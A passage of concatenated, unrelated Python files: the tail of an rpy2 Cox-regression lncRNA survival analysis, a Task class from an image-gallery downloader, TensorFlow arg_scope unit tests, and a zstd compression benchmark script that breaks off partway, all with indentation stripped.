data=[ii[-1] for ii in kaplan] ## Grabbing all the lncrna values for the current lncrna being analyzed
ro.globalenv['expression']=ro.FloatVector(data)
res=ro.r('round(qnorm((rank(expression, na.last="keep")-0.5)/sum(!is.na(expression))), digit=5)') ## Perform inverse normal transformation
inverse_norm=list(res) ## Convert robject to python list
## Prepare the variables for rpy2
ro.globalenv['lncrna']=ro.FloatVector(inverse_norm)
ro.globalenv['times']=ro.IntVector([ii[0] for ii in kaplan])
ro.globalenv['died']=ro.IntVector([death_dic[ii[1]] for ii in kaplan])
ro.globalenv['sex']=ro.IntVector([ii[3] for ii in kaplan])
ro.globalenv['age']=ro.IntVector([ii[4] for ii in kaplan])
res=ro.r('coxph(Surv(times,died) ~ lncrna + sex + age)') ## Perform Cox regression
## Parse the string of the result with python for the lncrna coefficient and pvalue
for entry in str(res).split('\n'):
try:
if entry.split()[0]=='lncrna':
coeff=entry.split()[1]
pvalue=entry.split()[-1]
break
except:
pass
coeffs.append(coeff)
pvalues.append(pvalue)
## This will write the results to a tab delimited file with lncrna name, cox coefficient, and pvalue.
f=open(os.path.join(BASE_DIR,'lncrna','cox','LUSC','coeffs_pvalues.txt'),'w')
for i,j,k in zip(lncrnas,coeffs,pvalues):
f.write(i)
f.write('\t')
f.write(j)
f.write('\t')
f.write(k)
f.write('\n')
f.close()
| |
#!/usr/bin/env python
# coding:utf-8
# Contributor:
# fffonion <fffonion@gmail.com>
import os
import re
import copy
import json
import uuid
import shutil
import zipfile
from threading import RLock
from . import util
from .const import *
from .const import __version__
if PY3K:
from queue import Queue, Empty
else:
from Queue import Queue, Empty
class Task(object):
# Given a config and url, create an instance of Task
def __init__(self, url, cfgdict):
self.url = url
# Set gallery id and hash by parsing the url
if url:
_ = RE_INDEX.findall(url)
if _:
self.gid, self.sethash = _[0]
self.failcode = 0
self.state = TASK_STATE_WAITING
self.guid = str(uuid.uuid4())[:8] # Unique identifier for the task
self.config = cfgdict
self.meta = {}
self.has_ori = False
self.reload_map = {} # {url:reload_url}
self.filehash_map = {} # map same hash to different ids, {url:((id, fname), )}
self.img_q = None
self.page_q = None
self.list_q = None
self._flist_done = set() # store id, don't save, will generate when scan
self._monitor = None
self._cnt_lock = RLock()
self._f_lock = RLock()
def cleanup(self):
"""Clean up the queues and reload map for finished and failed tasks."""
if self.state in (TASK_STATE_FINISHED, TASK_STATE_FAILED):
self.img_q = None
self.page_q = None
self.list_q = None
self.reload_map = {}
# if 'filelist' in self.meta:
# del self.meta['filelist']
# if 'resampled' in self.meta:
# del self.meta['resampled']
def set_fail(self, code):
"""Clean up all cached meta data when set the task status to FAILED"""
self.state = TASK_STATE_FAILED
self.failcode = code
# cleanup all we cached
self.meta = {}
def migrate_exhentai(self):
"""Reset the url into an exhentai one if the current one is e-hentai and
put the task back to waiting list."""
_ = re.findall("(?:https*://[g\.]*e\-hentai\.org)(.+)", self.url)
if not _:
return False
self.url = "https://exhentai.org%s" % _[0]
self.state = TASK_STATE_WAITING if self.state == TASK_STATE_FAILED else self.state
self.failcode = 0
return True
# def guess_ori(self):
# # guess if this gallery has resampled files depending on some sample hashes
# # return True if it's ori
# if 'sample_hash' not in self.meta:
# return
# all_keys = map(lambda x:x[:10], self.meta['filelist'].keys())
# for h in self.meta['sample_hash']:
# if h not in all_keys:
# self.has_ori = True
# break
# del self.meta['sample_hash']
def base_url(self):
"""Find the domain of site url, in which the task lives."""
return re.findall(RESTR_SITE, self.url)[0]
# def get_picpage_url(self, pichash):
# # if file resized, this url not works
# # http://%s.org/s/hash_s/gid-picid'
# return "%s/s/%s/%s-%s" % (
# self.base_url(), pichash[:10], self.gid, self.meta['filelist'][pichash][0]
# )
def set_reload_url(self, imgurl, reload_url, fname):
# if same file occurs severl times in a gallery
if imgurl in self.reload_map:
fpath = self.get_fpath()
old_fid = self.get_fname(imgurl)[0]
old_f = os.path.join(fpath, self.get_fidpad(old_fid))
this_fid = int(RE_GALLERY.findall(reload_url)[0][1])
this_f = os.path.join(fpath, self.get_fidpad(this_fid))
self._f_lock.acquire()
if os.path.exists(old_f):
# we can just copy old file if already downloaded
try:
with open(old_f, 'rb') as _of:
with open(this_f, 'wb') as _nf:
_nf.write(_of.read())
except Exception as ex:
self._f_lock.release()
raise ex
else:
self._f_lock.release()
self._cnt_lock.acquire()
self.meta['finished'] += 1
self._cnt_lock.release()
else:
# if not downloaded, we will copy them in save_file
if imgurl not in self.filehash_map:
self.filehash_map[imgurl] = []
self.filehash_map[imgurl].append((this_fid, old_fid))
self._f_lock.release()
else:
self.reload_map[imgurl] = [reload_url, fname]
def get_reload_url(self, imgurl):
if not imgurl:
return
return self.reload_map[imgurl][0]
def scan_downloaded(self, scaled = True):
fpath = self.get_fpath()
donefile = False
if os.path.exists(os.path.join(fpath, ".xehdone")) or os.path.exists("%s.zip" % fpath):
donefile = True
# can only check un-renamed files
for fid in range(1, self.meta['total'] + 1):
fname = os.path.join(fpath, self.get_fidpad(fid)) # id
if donefile or (os.path.exists(fname) and os.stat(fname).st_size > 0):
self._flist_done.add(int(fid))
self.meta['finished'] = len(self._flist_done)
if self.meta['finished'] == self.meta['total']:
self.state == TASK_STATE_FINISHED
def queue_wrapper(self, callback, pichash = None, url = None):
# if url is not finished, call callback to put into queue
# type 1: normal file; type 2: resampled url
# if pichash:
# fid = int(self.meta['filelist'][pichash][0])
# if fid not in self._flist_done:
# callback(self.get_picpage_url(pichash))
# elif url:
fhash, fid = RE_GALLERY.findall(url)[0]
# if fhash not in self.meta['filelist']:
# self.meta['resampled'][fhash] = int(fid)
# self.has_ori = True]
if int(fid) not in self._flist_done:
callback(url)
def save_file(self, imgurl, redirect_url, binary):
# TODO: Rlock for finished += 1
fpath = self.get_fpath()
self._f_lock.acquire()
if not os.path.exists(fpath):
os.mkdir(fpath)
self._f_lock.release()
pageurl, fname = self.reload_map[imgurl]
_ = re.findall("/([^/\?]+)(?:\?|$)", redirect_url)
if _: # change it if it's a full image
fname = _[0]
self.reload_map[imgurl][1] = fname
_, fid = RE_GALLERY.findall(pageurl)[0]
fn = os.path.join(fpath, self.get_fidpad(int(fid)))
if os.path.exists(fn) and os.stat(fn).st_size > 0:
return fn
self._cnt_lock.acquire()
self.meta['finished'] += 1
self._cnt_lock.release()
self._f_lock.acquire()
with open(fn, "wb") as f:
f.write(binary)
if imgurl in self.filehash_map:
for fid, _ in self.filehash_map[imgurl]:
fn_rep = os.path.join(fpath, self.get_fidpad(fid))
with open(fn_rep, "wb") as f:
f.write(binary)
self.meta['finished'] += 1
del self.filehash_map[imgurl]
self._f_lock.release()
def get_fname(self, imgurl):
"""Given image url, get file name and the order number for the img."""
pageurl, fname = self.reload_map[imgurl] # structure of reload map: k:[v1,v2]
_, fid = RE_GALLERY.findall(pageurl)[0] # fid is the order number of pics
return int(fid), fname
def get_fpath(self):
"""Get the path storing the task."""
return os.path.join(self.config['dir'], util.legalpath(self.meta['title']))
def get_fidpad(self, fid, ext = 'jpg'):
"""Naming the downloaded files in order (given total # of pages)."""
fid = int(fid)
_ = "%%0%dd.%%s" % (len(str(self.meta['total'])))
return _ % (fid, ext)
def rename_fname(self):
fpath = self.get_fpath()
tmppath = os.path.join(fpath, RENAME_TMPDIR)
cnt = 0
error_list = []
# we need to track renamed fid's to decide
# whether to rename into a temp filename or add (1)
# only need it when rename_ori = True
done_list = set()
for h in self.reload_map:
fid, fname = self.get_fname(h)
# if we don't need to rename to original name and file type matches
if not self.config['rename_ori'] and os.path.splitext(fname)[1].lower() == '.jpg':
continue
fname_ori = os.path.join(fpath, self.get_fidpad(fid)) # id
if self.config['rename_ori']:
if os.path.exists(os.path.join(tmppath, self.get_fidpad(fid))):
# if we previously put it into a temporary folder, we need to change fname_ori
fname_ori = os.path.join(tmppath, self.get_fidpad(fid))
fname_to = os.path.join(fpath, util.legalpath(fname))
else:
# Q: Why we don't just use id.ext when saving files instead of using
# id.jpg?
# A: If former task doesn't download all files, a new task with same gallery
# will have zero knowledge about file type before scanning all per page,
# thus can't determine if this id is downloaded, because file type is not
# necessarily .jpg
fname_to = os.path.join(fpath, self.get_fidpad(fid, os.path.splitext(fname)[1][1:]))
while fname_ori != fname_to:
if os.path.exists(fname_ori):
while os.path.exists(fname_to):
_base, _ext = os.path.splitext(fname_to)
_ = re.findall("\((\d+)\)$", _base)
if self.config['rename_ori'] and fname_to not in done_list:
# if our auto numbering conflicts with original naming
# we move it into a temporary folder
# It's safe since this file is same with one of our auto numbering filename,
# it could never be conflicted with other files in tmppath
if not os.path.exists(tmppath):
os.mkdir(tmppath)
os.rename(fname_to, os.path.join(tmppath, os.path.split(fname_to)[1]))
break
if _ :# if ...(1) exists, use ...(2)
print(_base)
_base = re.sub("\((\d+)\)$", _base, lambda x:"(%d)" % (int(x.group(1)) + 1))
else:
_base = "%s(1)" % _base
fname_to = "".join((_base, _ext))
try:
os.rename(fname_ori, fname_to)
except Exception as ex:
error_list.append((os.path.split(fname_ori)[1], os.path.split(fname_to)[1], str(ex)))
break
if self.config['rename_ori']:
done_list.add(fname_to)
break
cnt += 1
if cnt == self.meta['total']:
with open(os.path.join(fpath, ".xehdone"), "w"):
pass
try:
os.rmdir(tmppath)
except: # we will leave it undeleted if it's not empty
pass
return error_list
def make_archive(self):
"""Archive the downloaded task as a zip file."""
dpath = self.get_fpath()
arc = "%s.zip" % dpath
if os.path.exists(arc):
return arc
with zipfile.ZipFile(arc, 'w') as zipFile:
zipFile.comment = ("xeHentai Archiver v%s\nTitle:%s\nOriginal URL:%s" % (
__version__, self.meta['title'], self.url)).encode('utf-8')
for f in sorted(os.listdir(dpath)):
fullpath = os.path.join(dpath, f)
zipFile.write(fullpath, f, zipfile.ZIP_STORED)
shutil.rmtree(dpath)
return arc
def from_dict(self, j):
for k in self.__dict__:
if k not in j:
continue
if k.endswith('_q') and j[k]:
setattr(self, k, Queue())
[getattr(self, k).put(e, False) for e in j[k]]
else:
setattr(self, k, j[k])
_ = RE_INDEX.findall(self.url)
if _:
self.gid, self.sethash = _[0]
return self
def to_dict(self):
d = dict({k:v for k, v in self.__dict__.items()
if not k.endswith('_q') and not k.startswith("_")})
for k in ['img_q', 'page_q', 'list_q']:
if getattr(self, k):
d[k] = [e for e in getattr(self, k).queue]
return d
| |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""arg_scope tests."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.framework.python.ops import add_arg_scope
from tensorflow.contrib.framework.python.ops import arg_scope
from tensorflow.contrib.framework.python.ops import arg_scoped_arguments
from tensorflow.python.platform import test
@add_arg_scope
def func1(*args, **kwargs):
return (args, kwargs)
@add_arg_scope
def func2(*args, **kwargs):
return (args, kwargs)
@add_arg_scope
def func3(args, a=None, b=1, c=2):
"""Some cool doc string."""
return (args, a, b, c)
def _key_op(op):
return getattr(op, '_key_op', str(op))
class ArgScopeTest(test.TestCase):
def testEmptyArgScope(self):
with self.test_session():
with arg_scope([]) as sc:
self.assertEqual(sc, {})
def testClearArgScope(self):
func1_kwargs = {'a': 1, 'b': None, 'c': [1]}
key_op = _key_op(func1)
func1_scope = {key_op: func1_kwargs.copy()}
with self.test_session():
with arg_scope([func1], a=1, b=None, c=[1]) as sc1:
self.assertEqual(sc1, func1_scope)
with arg_scope({}) as sc2:
self.assertEqual(sc2, {})
with arg_scope([]) as current_arg_scope:
self.assertEqual(current_arg_scope, func1_scope)
def testNonDecorated(self):
def my_func(t, a=None):
return (t, a)
with self.assertRaises(ValueError):
with arg_scope([my_func], a=1):
pass
def testUnexpectedArg(self):
with self.assertRaises(TypeError):
with arg_scope([func3], d=1):
func3(1)
def testCurrentArgScope(self):
func1_kwargs = {'a': 1, 'b': None, 'c': [1]}
key_op = _key_op(func1)
current_scope = {key_op: func1_kwargs.copy()}
with self.test_session():
with arg_scope([func1], a=1, b=None, c=[1]) as scope:
self.assertDictEqual(scope, current_scope)
def testArgScopedArguments(self):
func3_kwargs = ('a', 'b', 'c')
self.assertEquals(arg_scoped_arguments(func3), func3_kwargs)
def testCurrentArgScopeNested(self):
func1_kwargs = {'a': 1, 'b': None, 'c': [1]}
func2_kwargs = {'b': 2, 'd': [2]}
key = _key_op
current_scope = {
key(func1): func1_kwargs.copy(),
key(func2): func2_kwargs.copy()
}
with self.test_session():
with arg_scope([func1], a=1, b=None, c=[1]):
with arg_scope([func2], b=2, d=[2]) as scope:
self.assertDictEqual(scope, current_scope)
def testReuseArgScope(self):
func1_kwargs = {'a': 1, 'b': None, 'c': [1]}
key_op = _key_op(func1)
current_scope = {key_op: func1_kwargs.copy()}
with self.test_session():
with arg_scope([func1], a=1, b=None, c=[1]) as scope1:
pass
with arg_scope(scope1) as scope:
self.assertDictEqual(scope, current_scope)
def testReuseArgScopeNested(self):
func1_kwargs = {'a': 1, 'b': None, 'c': [1]}
func2_kwargs = {'b': 2, 'd': [2]}
key = _key_op
current_scope1 = {key(func1): func1_kwargs.copy()}
current_scope2 = {
key(func1): func1_kwargs.copy(),
key(func2): func2_kwargs.copy()
}
with self.test_session():
with arg_scope([func1], a=1, b=None, c=[1]) as scope1:
with arg_scope([func2], b=2, d=[2]) as scope2:
pass
with arg_scope(scope1):
with arg_scope([]) as current_arg_scope:
self.assertDictEqual(current_arg_scope, current_scope1)
with arg_scope(scope2):
with arg_scope([]) as current_arg_scope:
self.assertDictEqual(current_arg_scope, current_scope2)
def testSimpleArgScope(self):
func1_args = (0,)
func1_kwargs = {'a': 1, 'b': None, 'c': [1]}
with self.test_session():
with arg_scope([func1], a=1, b=None, c=[1]):
args, kwargs = func1(0)
self.assertTupleEqual(args, func1_args)
self.assertDictEqual(kwargs, func1_kwargs)
def testSimpleArgScopeWithTuple(self):
func1_args = (0,)
func1_kwargs = {'a': 1, 'b': None, 'c': [1]}
with self.test_session():
with arg_scope((func1,), a=1, b=None, c=[1]):
args, kwargs = func1(0)
self.assertTupleEqual(args, func1_args)
self.assertDictEqual(kwargs, func1_kwargs)
def testOverwriteArgScope(self):
func1_args = (0,)
func1_kwargs = {'a': 1, 'b': 2, 'c': [1]}
with arg_scope([func1], a=1, b=None, c=[1]):
args, kwargs = func1(0, b=2)
self.assertTupleEqual(args, func1_args)
self.assertDictEqual(kwargs, func1_kwargs)
def testNestedArgScope(self):
func1_args = (0,)
func1_kwargs = {'a': 1, 'b': None, 'c': [1]}
with arg_scope([func1], a=1, b=None, c=[1]):
args, kwargs = func1(0)
self.assertTupleEqual(args, func1_args)
self.assertDictEqual(kwargs, func1_kwargs)
func1_kwargs['b'] = 2
with arg_scope([func1], b=2):
args, kwargs = func1(0)
self.assertTupleEqual(args, func1_args)
self.assertDictEqual(kwargs, func1_kwargs)
def testSharedArgScope(self):
func1_args = (0,)
func1_kwargs = {'a': 1, 'b': None, 'c': [1]}
with arg_scope([func1, func2], a=1, b=None, c=[1]):
args, kwargs = func1(0)
self.assertTupleEqual(args, func1_args)
self.assertDictEqual(kwargs, func1_kwargs)
args, kwargs = func2(0)
self.assertTupleEqual(args, func1_args)
self.assertDictEqual(kwargs, func1_kwargs)
def testSharedArgScopeTuple(self):
func1_args = (0,)
func1_kwargs = {'a': 1, 'b': None, 'c': [1]}
with arg_scope((func1, func2), a=1, b=None, c=[1]):
args, kwargs = func1(0)
self.assertTupleEqual(args, func1_args)
self.assertDictEqual(kwargs, func1_kwargs)
args, kwargs = func2(0)
self.assertTupleEqual(args, func1_args)
self.assertDictEqual(kwargs, func1_kwargs)
def testPartiallySharedArgScope(self):
func1_args = (0,)
func1_kwargs = {'a': 1, 'b': None, 'c': [1]}
func2_args = (1,)
func2_kwargs = {'a': 1, 'b': None, 'd': [2]}
with arg_scope([func1, func2], a=1, b=None):
with arg_scope([func1], c=[1]):
with arg_scope([func2], d=[2]):
args, kwargs = func1(0)
self.assertTupleEqual(args, func1_args)
self.assertDictEqual(kwargs, func1_kwargs)
args, kwargs = func2(1)
self.assertTupleEqual(args, func2_args)
self.assertDictEqual(kwargs, func2_kwargs)
def testDocString(self):
self.assertEqual(func3.__doc__, 'Some cool doc string.')
if __name__ == '__main__':
test.main()
| |
#!/usr/bin/env python
# Copyright (c) 2016-present, Gregory Szorc
# All rights reserved.
#
# This software may be modified and distributed under the terms
# of the BSD license. See the LICENSE file for details.
"""Very hacky script for benchmarking zstd.
Like most benchmarks, results should be treated with skepticism.
"""
import io
import os
import random
import struct
import time
import zlib
import zstandard as zstd
bio = io.BytesIO
def timer(fn, miniter=3, minwall=3.0):
"""Runs fn() multiple times and returns the results.
Runs for at least ``miniter`` iterations and ``minwall`` wall time.
"""
results = []
count = 0
# Ideally a monotonic clock, but doesn't matter too much.
wall_begin = time.time()
while True:
wstart = time.time()
start = os.times()
fn()
end = os.times()
wend = time.time()
count += 1
user = end[0] - start[0]
system = end[1] - start[1]
cpu = user + system
wall = wend - wstart
results.append((cpu, user, system, wall))
# Ensure we run at least ``miniter`` times.
if count < miniter:
continue
# And for ``minwall`` seconds.
elapsed = wend - wall_begin
if elapsed < minwall:
continue
break
return results
BENCHES = []
def bench(
mode,
title,
require_content_size=False,
simple=False,
zlib=False,
threads_arg=False,
chunks_as_buffer=False,
decompressed_sizes_arg=False,
cffi=True,
):
def wrapper(fn):
if not fn.__name__.startswith(("compress_", "decompress_")):
raise ValueError(
"benchmark function must begin with " "compress_ or decompress_"
)
fn.mode = mode
fn.title = title
fn.require_content_size = require_content_size
fn.simple = simple
fn.zlib = zlib
fn.threads_arg = threads_arg
fn.chunks_as_buffer = chunks_as_buffer
fn.decompressed_sizes_arg = decompressed_sizes_arg
fn.cffi = cffi
BENCHES.append(fn)
return fn
return wrapper
@bench("discrete", "compress() single use zctx")
def compress_one_use(chunks, zparams):
for chunk in chunks:
zctx = zstd.ZstdCompressor(compression_params=zparams)
zctx.compress(chunk)
@bench("discrete", "compress() reuse zctx", simple=True)
def compress_reuse(chunks, zparams):
zctx = zstd.ZstdCompressor(compression_params=zparams)
for chunk in chunks:
zctx.compress(chunk)
@bench(
"discrete",
"multi_compress_to_buffer() w/ buffer input",
simple=True,
threads_arg=True,
chunks_as_buffer=True,
cffi=False,
)
def compress_multi_compress_to_buffer_buffer(chunks, zparams, threads):
zctx = zstd.ZstdCompressor(compression_params=zparams)
zctx.multi_compress_to_buffer(chunks, threads=threads)
@bench(
"discrete",
"multi_compress_to_buffer() w/ list input",
threads_arg=True,
cffi=False,
)
def compress_multi_compress_to_buffer_list(chunks, zparams, threads):
zctx = zstd.ZstdCompressor(compression_params=zparams)
zctx.multi_compress_to_buffer(chunks, threads=threads)
@bench("discrete", "stream_reader()")
def compress_stream_reader(chunks, zparams):
zctx = zstd.ZstdCompressor(compression_params=zparams)
for chunk in chunks:
with zctx.stream_reader(chunk) as reader:
while reader.read(16384):
pass
@bench("discrete", "stream_writer()")
def compress_stream_writer(chunks, zparams):
zctx = zstd.ZstdCompressor(compression_params=zparams)
for chunk in chunks:
b = bio()
with zctx.stream_writer(b) as compressor:
compressor.write(chunk)
@bench("discrete", "stream_writer() w/ input size")
def compress_stream_writer_size(chunks, zparams):
zctx = zstd.ZstdCompressor(compression_params=zparams)
for chunk in chunks:
b = bio()
with zctx.stream_writer(b, size=len(chunk)) as compressor:
compressor.write(chunk)
@bench("discrete", "read_to_iter()")
def compress_read_to_iter(chunks, zparams):
zctx = zstd.ZstdCompressor(compression_params=zparams)
for chunk in chunks:
for d in zctx.read_to_iter(chunk):
pass
@bench("discrete", "read_to_iter() w/ input size")
def compress_read_to_iter_size(chunks, zparams):
zctx = zstd.ZstdCompressor(compression_params=zparams)
for chunk in chunks:
for d in zctx.read_to_iter(chunk, size=len(chunk)):
pass
@bench("discrete", "compressobj()")
def compress_compressobj(chunks, zparams):
zctx = zstd.ZstdCompressor(compression_params=zparams)
for chunk in chunks:
cobj = zctx.compressobj()
cobj.compress(chunk)
cobj.flush()
@bench("discrete", "compressobj() w/ input size")
def compress_compressobj_size(chunks, zparams):
zctx = zstd.ZstdCompressor(compression_params=zparams)
for chunk in chunks:
cobj = zctx.compressobj(size=len(chunk))
cobj.compress(chunk)
cobj.flush()
@bench("discrete", "chunker()")
def compress_chunker_discrete(chunks, zparams):
cctx = zstd.ZstdCompressor(compression_params=zparams)
for in_chunk in chunks:
chunker = cctx.chunker()
for out_chunk in chunker.compress(in_chunk):
pass
for out_chunk in chunker.finish():
pass
@bench("discrete", "chunker() w/ input size")
def compress_chunker_discrete_size(chunks, zparams):
cctx = zstd.ZstdCompressor(compression_params=zparams)
for in_chunk in chunks:
chunker = cctx.chunker(size=len(in_chunk))
for out_chunk in chunker.compress(in_chunk):
pass
for out_chunk in chunker.finish():
pass
@bench("discrete", "compress()", simple=True, zlib=True)
def compress_zlib_discrete(chunks, opts):
level = opts["zlib_level"]
c = zlib.compress
for chunk in chunks:
c(chunk, level)
@bench("stream", "compressobj()", simple=True, zlib=True)
def compress_zlib_compressobj(chunks, opts):
compressor = zlib.compressobj(opts["zlib_level"])
f = zlib.Z_SYNC_FLUSH
for chunk in chunks:
compressor.compress(chunk)
compressor.flush(f)
compressor.flush()
@bench("stream", "stream_writer()")
def compress_stream_stream_writer(chunks, zparams):
zctx = zstd.ZstdCompressor(compression_params=zparams)
b = bio()
with zctx.stream_writer(b) as compressor:
for chunk in chunks:
compressor.write(chunk)
compressor.flush()
@bench("stream", "compressobj()", simple=True)
def compress_stream_compressobj(chunks, zparams):
zctx = zstd.ZstdCompressor(compression_params=zparams)
compressor = zctx.compressobj()
flush = zstd.COMPRESSOBJ_FLUSH_BLOCK
for chunk in chunks:
compressor.compress(chunk)
compressor.flush(flush)
@bench("stream", "chunker()", simple=True)
def compress_stream_chunker(chunks, zparams):
cctx = zstd.ZstdCompressor(compression_params=zparams)
chunker = cctx.chunker()
for chunk in chunks:
for c in chunker.compress(chunk):
pass
for c in chunker.finish():
pass
@bench("content-dict", "compress()", simple=True)
def compress_content_dict_compress(chunks, zparams):
zstd.ZstdCompressor(compression_params=zparams).compress(chunks[0])
for i, chunk in enumerate(chunks[1:]):
d = zstd.ZstdCompressionDict(chunks[i])
zstd.ZstdCompressor(dict_data=d, compression_params=zparams).compress(
chunk
)
@bench("content-dict", "stream_writer()")
def compress_content_dict_stream_writer(chunks, zparams, use_size=False):
zctx = zstd.ZstdCompressor(compression_params=zparams)
b = bio()
with zctx.stream_writer(
b, size=len(chunks[0]) if use_size else -1
) as compressor:
compressor.write(chunks[0])
for i, chunk in enumerate(chunks[1:]):
d = zstd.ZstdCompressionDict(chunks[i])
b = bio()
zctx = zstd.ZstdCompressor(dict_data=d, compression_params=zparams)
with zctx.stream_writer(
b, size=len(chunk) if use_size else -1
) as compressor:
compressor.write(chunk)
@bench("content-dict", "stream_writer() w/ input size")
def compress_content_dict_stream_writer_size(chunks, zparams):
compress_content_dict_stream_writer(chunks, zparams, use_size=True)
@bench("content-dict", "read_to_iter()")
def compress_content_dict_read_to_iter(chunks, zparams, use_size=False):
zctx = zstd.ZstdCompressor(compression_params=zparams)
size = len(chunks[0]) if use_size else -1
for o in zctx.read_to_iter(chunks[0], size=size):
pass
for i, chunk in enumerate(chunks[1:]):
d = zstd.ZstdCompressionDict(chunks[i])
zctx = zstd.ZstdCompressor(dict_data=d, compression_params=zparams)
size = len(chunk) if use_size else -1
for o in zctx.read_to_iter(chunk, size=size):
pass
@bench("content-dict", "read_to_iter() w/ input size")
def compress_content_dict_read_to_iter_size(chunks, zparams):
compress_content_dict_read_to_iter(chunks, zparams, use_size=True)
@bench("content-dict", "compressobj()")
def compress_content_dict_compressobj(chunks, zparams, use_size=False):
zctx = zstd.ZstdCompressor(compression_params=zparams)
cobj = zctx.compressobj(size=len(chunks[0]) if use_size else -1)
cobj.compress(chunks[0])
cobj.flush()
for i, chunk in enumerate(chunks[1:]):
d = zstd.ZstdCompressionDict(chunks[i])
zctx = zstd.ZstdCompressor(dict_data=d, compression_params=zparams)
cobj = zctx.compressobj(len(chunk) if use_size else -1)
cobj.compress(chunk)
cobj.flush()
@bench("content-dict", "compressobj() w/ input size")
def compress_content_dict_compressobj_size(chunks, zparams):
compress_content_dict_compressobj(chunks, zparams, use_size=True)
@bench("discrete", "decompress() single use zctx", require_content_size=True)
def decompress_one_use(chunks, opts):
for chunk in chunks:
zctx = zstd.ZstdDecompressor(**opts)
zctx.decompress(chunk)
@bench(
"discrete",
"decompress() reuse zctx",
require_content_size=True,
simple=True,
)
def decompress_reuse(chunks, opts):
zctx = zstd.ZstdDecompressor(**opts)
for chunk in chunks:
zctx.decompress(chunk)
@bench("discrete", "decompress()", simple=True, zlib=True)
def decompress_zlib_decompress(chunks):
d = zlib.decompress
for chunk in chunks:
d(chunk)
@bench(
"discrete",
"multi_decompress_to_buffer() w/ buffer input + sizes",
simple=True,
threads_arg=True,
decompressed_sizes_arg=True,
chunks_as_buffer=True,
cffi=False,
)
def decompress_multi_decompress_to_buffer_buffer_and_size(
chunks, opts, threads, decompressed_sizes
):
zctx = zstd.ZstdDecompressor(**opts)
zctx.multi_decompress_to_buffer(
chunks, decompressed_sizes=decompressed_sizes, threads=threads
)
@bench(
"discrete",
"multi_decompress_to_buffer() w/ buffer input",
require_content_size=True,
threads_arg=True,
chunks_as_buffer=True,
cffi=False,
)
def decompress_multi_decompress_to_buffer_buffer(chunks, opts, threads):
zctx = zstd.ZstdDecompressor(**opts)
zctx.multi_decompress_to_buffer(chunks, threads=threads)
@bench(
"discrete",
"multi_decompress_to_buffer() w/ list of bytes input + sizes",
threads_arg=True,
decompressed_sizes_arg=True,
cffi=False,
)
def decompress_multi_decompress_to_buffer_list_and_sizes(
chunks, opts, threads, decompressed_sizes
):
zctx = zstd.ZstdDecompressor(**opts)
zctx.multi_decompress_to_buffer(
chunks, decompressed_sizes=decompressed_sizes, threads=threads
)
@bench(
"discrete",
"multi_decompress_to_buffer() w/ list of bytes input",
require_content_size=True,
threads_arg=True,
cffi=False,
)
def decompress_multi_decompress_to_buffer_list(chunks, opts, threads):
zctx = zstd.ZstdDecompressor(**opts)
zctx.multi_decompress_to_buffer(chunks, threads=threads)
@bench("discrete", "stream_reader()")
def decompress_stream_reader(chunks, opts):
zctx = zstd.ZstdDecompressor(**opts)
for chunk in chunks:
with zctx.stream_reader(chunk) as reader:
while reader.read(16384):
pass
@bench("discrete", "stream_writer()")
def decompress_stream_writer(chunks, opts):
zctx = zstd.ZstdDecompressor(**opts)
for chunk in chunks:
with zctx.stream_writer(bio()) as decompressor:
decompressor.write(chunk)
@bench("discrete", "read_to_iter()")
def decompress_read_to_iter(chunks, opts):
zctx = zstd.ZstdDecompressor(**opts)
for chunk in chunks:
for d in zctx.read_to_iter(chunk):
pass
@bench("discrete", "decompressobj()")
def decompress_decompressobj(chunks, opts):
zctx = zstd.ZstdDecompressor(**opts)
for chunk in chunks:
decompressor = zctx.decompressobj()
decompressor.decompress(chunk)
@bench("stream", "decompressobj()", simple=True, zlib=True)
def decompress_zlib_stream(chunks):
dobj = zlib.decompressobj()
for chunk in chunks:
dobj.decompress(chunk)
dobj.flush()
@bench("stream", "stream_writer()")
def decompress_stream_stream_writer(chunks, opts):
zctx = zstd.ZstdDecompressor(**opts)
with zctx.stream_writer(bio()) as decompressor:
for chunk in chunks:
decompressor.write(chunk)
@bench("stream", "decompressobj()", simple=True)
def decompress_stream_decompressobj(chunks, opts):
zctx = zstd.ZstdDecompressor(**opts)
decompressor = zctx.decompressobj()
for chunk in chunks:
decompressor.decompress(chunk)
@bench("content-dict", "decompress()", require_content_size=True)
def decompress_content_dict_decompress(chunks, opts):
zctx = zstd.ZstdDecompressor(**opts)
last = zctx.decompress(chunks[0])
for chunk in chunks[1:]:
d = zstd.ZstdCompressionDict(last)
zctx = zstd.ZstdDecompressor(dict_data=d, **opts)
last = zctx.decompress(chunk)
@bench("content-dict", "stream_writer()")
def decompress_content_dict_stream_writer(chunks, opts):
zctx = zstd.ZstdDecompressor(**opts)
b = bio()
with zctx.stream_writer(b) as decompressor:
decompressor.write(chunks[0])
last = b.getvalue()
for chunk in chunks[1:]:
d = zstd.ZstdCompressionDict(last)
zctx = zstd.ZstdDecompressor(dict_data=d, **opts)
b = bio()
with zctx.stream_writer(b) as decompressor:
decompressor.write(chunk)
last = b.getvalue()
@bench("content-dict", "read_to_iter()")
def decompress_content_dict_read_to_iter(chunks, opts):
zctx = zstd.ZstdDecompressor(**opts)
last = b"".join(zctx.read_to_iter(chunks[0]))
for chunk in chunks[1:]:
d = zstd.ZstdCompressionDict(last)
zctx = zstd.ZstdDecompressor(dict_data=d, **opts)
last = b"".join(zctx.read_to_iter(chunk))
@bench("content-dict", "decompressobj()")
def decompress_content_dict_decompressobj(chunks, opts):
zctx = zstd.ZstdDecompressor(**opts)
last = zctx.decompressobj().decompress(chunks[0])
for chunk in chunks[1:]:
d = zstd.ZstdCompressionDict(last)
zctx = zstd.ZstdDecompressor(dict_data=d, **opts)
last = zctx.decompressobj().decompress(chunk)
@bench("content-dict", "decompress_content_dict_chain()", simple=True)
def decompress_content_dict_chain_api(chunks, opts):
zctx = zstd.ZstdDecompressor(**opts)
zctx.decompress_content_dict_chain(chunks)
def get_chunks(paths, limit_count, encoding, chunk_size=None):
chunks = []
def process_file(p):
with open(p, "rb") as fh:
data = fh.read()
if not data:
return
if encoding == "raw":
pass
elif encoding == "zlib":
data = zlib.decompress(data)
else:
